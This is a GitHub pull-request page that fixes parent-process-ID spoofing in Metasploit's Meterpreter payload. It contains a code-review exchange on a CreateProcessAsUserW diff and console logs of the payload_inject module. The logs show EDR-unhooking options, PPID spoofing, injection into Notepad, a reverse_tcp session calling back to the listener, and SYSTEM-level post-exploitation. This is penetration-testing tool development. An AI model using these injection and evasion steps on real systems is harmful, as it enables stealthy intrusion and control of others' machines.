-
Notifications
You must be signed in to change notification settings - Fork 656
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Fix PPID spoofing #660
Fix PPID spoofing #660
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Tested the code and the changes look good. I just left the one comment.
@@ -382,11 +388,13 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet) | |||
} | |||
} | |||
|
|||
// Try to execute the process with duplicated token | |||
if (!CreateProcessAsUserW(pToken, NULL, commandLine_w, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi)) | |||
if (!CreateProcessAsUserW(pToken, NULL, commandLine_w, NULL, NULL, inherit, createFlags, pEnvironment, NULL, (LPSTARTUPINFOW)&si, &pi)) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The cast here of si
to LPSTARTUPINFOW
is concerning. Up to this point si
was STARTUPINFOEXA
using multi byte strings and not wide strings. Should si
be completely switched to STARTUPINFOEXW
? If that's the case, you could apply this patch I tested that will switch it to always using the W variant. https://github.com/smcintyre-r7/metasploit-payloads/commit/abd29ba1d709cb5aab08c55704614f38d5788c62.patch
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah that is concerning. I've applied and tested that patch - looks good. Thanks.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Changes look good to me. I tested them again with the new patch and everything checks out. I'll have this landed in a moment. Thanks for fixing this!
Before / Unpatched
msf6 exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 7568 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION -1 yes The session to run this module on
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/local/payload_inject) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running module against DC
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The parameter is incorrect.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/payload_inject) >
After / Patched
[*] Using exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set PPID 3592
PPID => 3592
msf6 exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 3592 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION yes The session to run this module on
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/payload_inject) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/payload_inject) > run
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running module against DC
[*] Spawned Notepad process 1664
[*] Spoofing PPID 3592
[*] Injecting payload into 1664
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 1664
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:61873) at 2023-06-20 13:07:45 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/test/cmd_exec
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should return the result of echo
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[*] Passed: 4; Failed: 0; Skipped: 0
meterpreter > run post/test/file
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should test for directory existence
[+] should create directories
[+] should list the directory we just made
[+] should recursively delete the directory we just made
[+] should delete a symbolic link target
[+] should not recurse into symbolic link directories
[+] should test for file existence
[+] should create text files
[+] should read the text we just wrote
[+] should append text files
[+] should delete text files
[+] should move files
[+] should write binary data
[+] should read the binary data we just wrote
[+] should delete binary files
[+] should append binary data
[*] Passed: 16; Failed: 0; Skipped: 0
meterpreter > run post/test/meterpreter
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0; Skipped: 0
meterpreter >
Includes changes from: * rapid7/metasploit-payloads#662 * rapid7/metasploit-payloads#660
Includes changes from: * rapid7/metasploit-payloads#662 * rapid7/metasploit-payloads#660
Includes changes from: * rapid7/metasploit-payloads#662 * rapid7/metasploit-payloads#660
This PR fixes rapid7/metasploit-framework#18113.
The commit be44377 introduced the issue by removing the structures required for PPID spoofing. I reverted that commit which fixed the issue. I added back in what I believe to be the intent of that commit: better memory management for the
commandLine_w
variable.